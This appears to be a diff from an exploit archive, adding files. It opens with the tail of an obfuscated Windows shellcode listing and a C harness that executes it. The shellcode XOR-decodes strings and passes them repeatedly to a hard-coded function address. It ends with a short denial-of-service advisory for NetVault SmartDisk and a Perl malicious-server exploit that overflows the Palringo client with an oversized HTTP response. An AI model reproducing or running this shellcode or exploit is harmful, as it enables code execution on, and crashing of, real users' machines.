8d: 31 d1 xor %edx,%ecx
|
||||
8f: 51 push %ecx
|
||||
90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
|
||||
95: ba 5b 67 4c 63 mov $0x634c675b,%edx
|
||||
9a: 31 d1 xor %edx,%ecx
|
||||
9c: 51 push %ecx
|
||||
9d: b9 03 24 36 21 mov $0x21362403,%ecx
|
||||
a2: ba 62 50 59 53 mov $0x53595062,%edx
|
||||
a7: 31 d1 xor %edx,%ecx
|
||||
a9: 51 push %ecx
|
||||
aa: b9 34 41 15 18 mov $0x18154134,%ecx
|
||||
af: ba 5d 32 61 6a mov $0x6a61325d,%edx
|
||||
b4: 31 d1 xor %edx,%ecx
|
||||
b6: 51 push %ecx
|
||||
b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
|
||||
bc: ba 68 68 72 4b mov $0x4b726868,%edx
|
||||
c1: 31 d1 xor %edx,%ecx
|
||||
c3: 51 push %ecx
|
||||
c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
|
||||
c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
|
||||
ce: 31 d1 xor %edx,%ecx
|
||||
d0: 51 push %ecx
|
||||
d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
|
||||
d6: ba 70 4b 70 51 mov $0x51704b70,%edx
|
||||
db: 31 d1 xor %edx,%ecx
|
||||
dd: 51 push %ecx
|
||||
de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
|
||||
e3: ba 51 45 51 2d mov $0x2d514551,%edx
|
||||
e8: 31 d1 xor %edx,%ecx
|
||||
ea: 51 push %ecx
|
||||
eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
|
||||
f0: ba 4d 39 68 39 mov $0x3968394d,%edx
|
||||
f5: 31 d1 xor %edx,%ecx
|
||||
f7: 51 push %ecx
|
||||
f8: 89 e0 mov %esp,%eax
|
||||
fa: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
ff: c1 eb 08 shr $0x8,%ebx
|
||||
102: c1 eb 08 shr $0x8,%ebx
|
||||
105: c1 eb 08 shr $0x8,%ebx
|
||||
108: 53 push %ebx
|
||||
109: 50 push %eax
|
||||
10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
10f: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
114: 31 d3 xor %edx,%ebx
|
||||
116: ff d3 call *%ebx
|
||||
118: 31 c0 xor %eax,%eax
|
||||
11a: 50 push %eax
|
||||
11b: 68 41 41 64 64 push $0x64644141
|
||||
120: 58 pop %eax
|
||||
121: c1 e8 08 shr $0x8,%eax
|
||||
124: c1 e8 08 shr $0x8,%eax
|
||||
127: 50 push %eax
|
||||
128: b9 02 63 6b 35 mov $0x356b6302,%ecx
|
||||
12d: ba 4b 43 44 54 mov $0x5444434b,%edx
|
||||
132: 31 d1 xor %edx,%ecx
|
||||
134: 51 push %ecx
|
||||
135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
|
||||
13a: ba 43 75 2d 71 mov $0x712d7543,%edx
|
||||
13f: 31 d1 xor %edx,%ecx
|
||||
141: 51 push %ecx
|
||||
142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
|
||||
147: ba 54 5a 49 69 mov $0x69495a54,%edx
|
||||
14c: 31 d1 xor %edx,%ecx
|
||||
14e: 51 push %ecx
|
||||
14f: b9 25 34 12 67 mov $0x67123425,%ecx
|
||||
154: ba 4a 44 32 32 mov $0x3232444a,%edx
|
||||
159: 31 d1 xor %edx,%ecx
|
||||
15b: 51 push %ecx
|
||||
15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
|
||||
161: ba 6e 71 74 6d mov $0x6d74716e,%edx
|
||||
166: 31 d1 xor %edx,%ecx
|
||||
168: 51 push %ecx
|
||||
169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
|
||||
16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
|
||||
173: 31 d1 xor %edx,%ecx
|
||||
175: 51 push %ecx
|
||||
176: b9 35 15 03 2a mov $0x2a031535,%ecx
|
||||
17b: ba 67 70 6e 45 mov $0x456e7067,%edx
|
||||
180: 31 d1 xor %edx,%ecx
|
||||
182: 51 push %ecx
|
||||
183: b9 3a 17 75 46 mov $0x4675173a,%ecx
|
||||
188: ba 6f 47 55 64 mov $0x6455476f,%edx
|
||||
18d: 31 d1 xor %edx,%ecx
|
||||
18f: 51 push %ecx
|
||||
190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
|
||||
195: ba 6a 72 59 51 mov $0x5159726a,%edx
|
||||
19a: 31 d1 xor %edx,%ecx
|
||||
19c: 51 push %ecx
|
||||
19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
|
||||
1a2: ba 66 65 45 6b mov $0x6b456566,%edx
|
||||
1a7: 31 d1 xor %edx,%ecx
|
||||
1a9: 51 push %ecx
|
||||
1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
|
||||
1af: ba 53 65 61 7a mov $0x7a616553,%edx
|
||||
1b4: 31 d1 xor %edx,%ecx
|
||||
1b6: 51 push %ecx
|
||||
1b7: 89 e0 mov %esp,%eax
|
||||
1b9: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
1be: c1 eb 08 shr $0x8,%ebx
|
||||
1c1: c1 eb 08 shr $0x8,%ebx
|
||||
1c4: c1 eb 08 shr $0x8,%ebx
|
||||
1c7: 53 push %ebx
|
||||
1c8: 50 push %eax
|
||||
1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
1ce: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
1d3: 31 d3 xor %edx,%ebx
|
||||
1d5: ff d3 call *%ebx
|
||||
1d7: 31 c0 xor %eax,%eax
|
||||
1d9: 50 push %eax
|
||||
1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
|
||||
1df: ba 38 6c 53 38 mov $0x38536c38,%edx
|
||||
1e4: 31 d1 xor %edx,%ecx
|
||||
1e6: 51 push %ecx
|
||||
1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
|
||||
1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
|
||||
1f1: 31 d1 xor %edx,%ecx
|
||||
1f3: 51 push %ecx
|
||||
1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
|
||||
1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
|
||||
1fe: 31 d1 xor %edx,%ecx
|
||||
200: 51 push %ecx
|
||||
201: b9 1d 30 15 28 mov $0x2815301d,%ecx
|
||||
206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
|
||||
20b: 31 d1 xor %edx,%ecx
|
||||
20d: 51 push %ecx
|
||||
20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
|
||||
213: ba 53 5b 77 44 mov $0x44775b53,%edx
|
||||
218: 31 d1 xor %edx,%ecx
|
||||
21a: 51 push %ecx
|
||||
21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
|
||||
220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
|
||||
225: 31 d1 xor %edx,%ecx
|
||||
227: 51 push %ecx
|
||||
228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
|
||||
22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
|
||||
232: 31 d1 xor %edx,%ecx
|
||||
234: 51 push %ecx
|
||||
235: b9 20 2b 26 26 mov $0x26262b20,%ecx
|
||||
23a: ba 63 44 48 48 mov $0x48484463,%edx
|
||||
23f: 31 d1 xor %edx,%ecx
|
||||
241: 51 push %ecx
|
||||
242: b9 08 2b 23 67 mov $0x67232b08,%ecx
|
||||
247: ba 66 52 77 34 mov $0x34775266,%edx
|
||||
24c: 31 d1 xor %edx,%ecx
|
||||
24e: 51 push %ecx
|
||||
24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
|
||||
254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
|
||||
259: 31 d1 xor %edx,%ecx
|
||||
25b: 51 push %ecx
|
||||
25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
|
||||
261: ba 45 47 32 41 mov $0x41324745,%edx
|
||||
266: 31 d1 xor %edx,%ecx
|
||||
268: 51 push %ecx
|
||||
269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
|
||||
26e: ba 71 45 68 49 mov $0x49684571,%edx
|
||||
273: 31 d1 xor %edx,%ecx
|
||||
275: 51 push %ecx
|
||||
276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
|
||||
27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
|
||||
280: 31 d1 xor %edx,%ecx
|
||||
282: 51 push %ecx
|
||||
283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
|
||||
288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
|
||||
28d: 31 d1 xor %edx,%ecx
|
||||
28f: 51 push %ecx
|
||||
290: b9 34 23 23 3b mov $0x3b232334,%ecx
|
||||
295: ba 68 77 46 49 mov $0x49467768,%edx
|
||||
29a: 31 d1 xor %edx,%ecx
|
||||
29c: 51 push %ecx
|
||||
29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
|
||||
2a2: ba 73 48 65 78 mov $0x78654873,%edx
|
||||
2a7: 31 d1 xor %edx,%ecx
|
||||
2a9: 51 push %ecx
|
||||
2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
|
||||
2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
|
||||
2b4: 31 d1 xor %edx,%ecx
|
||||
2b6: 51 push %ecx
|
||||
2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
|
||||
2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
|
||||
2c1: 31 d1 xor %edx,%ecx
|
||||
2c3: 51 push %ecx
|
||||
2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
|
||||
2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
|
||||
2ce: 31 d1 xor %edx,%ecx
|
||||
2d0: 51 push %ecx
|
||||
2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
|
||||
2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
|
||||
2db: 31 d1 xor %edx,%ecx
|
||||
2dd: 51 push %ecx
|
||||
2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
|
||||
2e3: ba 49 62 78 52 mov $0x52786249,%edx
|
||||
2e8: 31 d1 xor %edx,%ecx
|
||||
2ea: 51 push %ecx
|
||||
2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
|
||||
2f0: ba 61 31 67 75 mov $0x75673161,%edx
|
||||
2f5: 31 d1 xor %edx,%ecx
|
||||
2f7: 51 push %ecx
|
||||
2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
|
||||
2fd: ba 62 64 68 73 mov $0x73686462,%edx
|
||||
302: 31 d1 xor %edx,%ecx
|
||||
304: 51 push %ecx
|
||||
305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
|
||||
30a: ba 36 33 78 69 mov $0x69783336,%edx
|
||||
30f: 31 d1 xor %edx,%ecx
|
||||
311: 51 push %ecx
|
||||
312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
|
||||
317: ba 31 52 4c 67 mov $0x674c5231,%edx
|
||||
31c: 31 d1 xor %edx,%ecx
|
||||
31e: 51 push %ecx
|
||||
31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
|
||||
324: ba 58 49 79 72 mov $0x72794958,%edx
|
||||
329: 31 d1 xor %edx,%ecx
|
||||
32b: 51 push %ecx
|
||||
32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
|
||||
331: ba 2d 65 52 6e mov $0x6e52652d,%edx
|
||||
336: 31 d1 xor %edx,%ecx
|
||||
338: 51 push %ecx
|
||||
339: b9 16 10 1f 17 mov $0x171f1016,%ecx
|
||||
33e: ba 34 58 54 52 mov $0x52545834,%edx
|
||||
343: 31 d1 xor %edx,%ecx
|
||||
345: 51 push %ecx
|
||||
346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
|
||||
34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
|
||||
350: 31 d1 xor %edx,%ecx
|
||||
352: 51 push %ecx
|
||||
353: b9 39 22 5e 50 mov $0x505e2239,%ecx
|
||||
358: ba 4b 47 39 70 mov $0x7039474b,%edx
|
||||
35d: 31 d1 xor %edx,%ecx
|
||||
35f: 51 push %ecx
|
||||
360: 89 e0 mov %esp,%eax
|
||||
362: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
367: c1 eb 08 shr $0x8,%ebx
|
||||
36a: c1 eb 08 shr $0x8,%ebx
|
||||
36d: c1 eb 08 shr $0x8,%ebx
|
||||
370: 53 push %ebx
|
||||
371: 50 push %eax
|
||||
372: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
377: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
37c: 31 d3 xor %edx,%ebx
|
||||
37e: ff d3 call *%ebx
|
||||
380: 31 c0 xor %eax,%eax
|
||||
382: 50 push %eax
|
||||
383: b8 41 41 41 65 mov $0x65414141,%eax
|
||||
388: c1 e8 08 shr $0x8,%eax
|
||||
38b: c1 e8 08 shr $0x8,%eax
|
||||
38e: c1 e8 08 shr $0x8,%eax
|
||||
391: 50 push %eax
|
||||
392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
|
||||
397: ba 6d 32 5b 50 mov $0x505b326d,%edx
|
||||
39c: 31 d1 xor %edx,%ecx
|
||||
39e: 51 push %ecx
|
||||
39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
|
||||
3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
|
||||
3a9: 31 d1 xor %edx,%ecx
|
||||
3ab: 51 push %ecx
|
||||
3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
|
||||
3b1: ba 69 73 62 75 mov $0x75627369,%edx
|
||||
3b6: 31 d1 xor %edx,%ecx
|
||||
3b8: 51 push %ecx
|
||||
3b9: b9 20 41 47 36 mov $0x36474120,%ecx
|
||||
3be: ba 45 35 67 59 mov $0x59673545,%edx
|
||||
3c3: 31 d1 xor %edx,%ecx
|
||||
3c5: 51 push %ecx
|
||||
3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
|
||||
3cb: ba 47 69 44 59 mov $0x59446947,%edx
|
||||
3d0: 31 d1 xor %edx,%ecx
|
||||
3d2: 51 push %ecx
|
||||
3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
|
||||
3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
|
||||
3dd: 31 d1 xor %edx,%ecx
|
||||
3df: 51 push %ecx
|
||||
3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
|
||||
3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
|
||||
3ea: 31 d1 xor %edx,%ecx
|
||||
3ec: 51 push %ecx
|
||||
3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
|
||||
3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
|
||||
3f7: 31 d1 xor %edx,%ecx
|
||||
3f9: 51 push %ecx
|
||||
3fa: 89 e0 mov %esp,%eax
|
||||
3fc: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
401: c1 eb 08 shr $0x8,%ebx
|
||||
404: c1 eb 08 shr $0x8,%ebx
|
||||
407: c1 eb 08 shr $0x8,%ebx
|
||||
40a: 53 push %ebx
|
||||
40b: 50 push %eax
|
||||
40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
411: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
416: 31 d3 xor %edx,%ebx
|
||||
418: ff d3 call *%ebx
|
||||
41a: 31 c0 xor %eax,%eax
|
||||
41c: 50 push %eax
|
||||
41d: b8 41 41 41 6f mov $0x6f414141,%eax
|
||||
422: c1 e8 08 shr $0x8,%eax
|
||||
425: c1 e8 08 shr $0x8,%eax
|
||||
428: c1 e8 08 shr $0x8,%eax
|
||||
42b: 50 push %eax
|
||||
42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
|
||||
431: ba 52 4b 70 4d mov $0x4d704b52,%edx
|
||||
436: 31 d1 xor %edx,%ecx
|
||||
438: 51 push %ecx
|
||||
439: b9 54 3a 05 52 mov $0x52053a54,%ecx
|
||||
43e: ba 35 48 71 6f mov $0x6f714835,%edx
|
||||
443: 31 d1 xor %edx,%ecx
|
||||
445: 51 push %ecx
|
||||
446: b9 29 16 0a 47 mov $0x470a1629,%ecx
|
||||
44b: ba 4c 36 79 33 mov $0x3379364c,%edx
|
||||
450: 31 d1 xor %edx,%ecx
|
||||
452: 51 push %ecx
|
||||
453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
|
||||
458: ba 55 6d 32 5d mov $0x5d326d55,%edx
|
||||
45d: 31 d1 xor %edx,%ecx
|
||||
45f: 51 push %ecx
|
||||
460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
|
||||
465: ba 41 77 48 75 mov $0x75487741,%edx
|
||||
46a: 31 d1 xor %edx,%ecx
|
||||
46c: 51 push %ecx
|
||||
46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
|
||||
472: ba 53 59 4e 77 mov $0x774e5953,%edx
|
||||
477: 31 d1 xor %edx,%ecx
|
||||
479: 51 push %ecx
|
||||
47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
|
||||
47f: ba 72 32 78 41 mov $0x41783272,%edx
|
||||
484: 31 d1 xor %edx,%ecx
|
||||
486: 51 push %ecx
|
||||
487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
|
||||
48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
|
||||
491: 31 d1 xor %edx,%ecx
|
||||
493: 51 push %ecx
|
||||
494: 89 e0 mov %esp,%eax
|
||||
496: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
49b: c1 eb 08 shr $0x8,%ebx
|
||||
49e: c1 eb 08 shr $0x8,%ebx
|
||||
4a1: c1 eb 08 shr $0x8,%ebx
|
||||
4a4: 53 push %ebx
|
||||
4a5: 50 push %eax
|
||||
4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
4ab: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
4b0: 31 d3 xor %edx,%ebx
|
||||
4b2: ff d3 call *%ebx
|
||||
4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx
|
||||
4b9: ba 63 36 46 46 mov $0x46463663,%edx
|
||||
4be: 31 d3 xor %edx,%ebx
|
||||
4c0: ff d3 call *%ebx
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
11
platforms/windows/dos/35804.txt
Executable file
11
platforms/windows/dos/35804.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/48029/info
|
||||
|
||||
NetVault: SmartDisk is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
A successful exploit will cause the application to crash, effectively denying service.
|
||||
|
||||
NOTE: Remote code execution may be possible; however, this has not been confirmed.
|
||||
|
||||
NetVault: SmartDisk versions 1.2.2 and prior are affected.
|
||||
|
||||
http://www.exploit-db.com/sploits/35804.zip
|
25
platforms/windows/local/35741.pl
Executable file
25
platforms/windows/local/35741.pl
Executable file
|
@ -0,0 +1,25 @@
|
|||
#!/use/bin/perl
|
||||
# Exploit Title: ?palringo stack buffer overflow
|
||||
# Date: 10 January 2015
|
||||
# Vulnerability discovered by: Mr.ALmfL9
|
||||
# Vendor Homepage: http://www.palringo.com/
|
||||
# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
|
||||
# Version: 2.8.1
|
||||
# Tested on: Windows 8.1
|
||||
use IO::Socket;
|
||||
$port = 8080;
|
||||
my $payload = "\x41" x 144;
|
||||
$payload = $payload. "\x42" x 4 ;
|
||||
$payload = $payload. "\x42" x 9000;
|
||||
$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
|
||||
while($cli=$serv->accept()){
|
||||
print "[#] port is: $port\n";
|
||||
print $cli "HTTP/$payload\r\n\r\n";
|
||||
while(<$cli>){
|
||||
print $cli;
|
||||
|
||||
}
|
||||
}
|
||||
#*REFERENCE*
|
||||
#.1=http://store2.up-00.com/2015-01/1420867197761.png
|
||||
#.2=http://store2.up-00.com/2015-01/1420867235381.png
|
Loading…
Add table
Reference in a new issue